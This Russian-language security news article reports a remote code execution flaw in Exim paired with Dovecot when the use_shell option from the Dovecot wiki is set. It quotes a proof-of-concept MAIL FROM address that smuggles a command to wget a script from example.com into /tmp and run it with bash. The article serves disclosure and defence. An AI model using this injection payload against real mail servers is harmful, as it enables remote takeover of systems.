Обнаружена критическая уязвимость в конфигурации Exim и Dovecot

Обнаружена критическая уязвимость в конфигурации Exim и Dovecot

При работе в связке с IMAP/POP3-сервером Dovecot и при их настройке согласно рекомендациям разработчиков возможно удаленное выполнение кода на сервере.

Согласно сообщению исследователей информационной безопасности из RedTeam Pentesting, им удалось обнаружить критическую уязвимость в почтовом сервере Exim, работающем в связке с IMAP/POP3-сервером Dovecot. Удаленный пользователь может выполнить произвольный код на сервере при условии, что работа данного ПО была сконфигурирована согласно рекомендациям на wiki-сайте проекта.

Для эксплуатации бреши злоумышленникам достаточно отправить на почтовый сервер письмо со специально сформированным адресом отправителя. В случае если в конфигурации Exim в блоке подключения Dovecot указана опция «use_shell», на системе будет выполнен помещенный в адрес код.

Стоит отметить, что на сегодняшний день данная конфигурация содержится во многих руководствах по настройке, поскольку впервые ошибочная опция была опубликована на официальном портале Dovecot еще в 2009 году.

В RedTeam Pentesting также предоставили пример эксплуатации бреши. При указании в качестве адреса отправителя «MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com» почтовый сервер выполнит команду «/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"», что свою очередь, приводит к запуску wget, а также к загрузке и выполнению внешнего скрипта c сайта example.com/test.sh. 

Ученые доказали: чтение нашего канала продлевает жизнь!

Ладно, не доказали. Но мы работаем над этим

Поучаствуйте в эксперименте — подпишитесь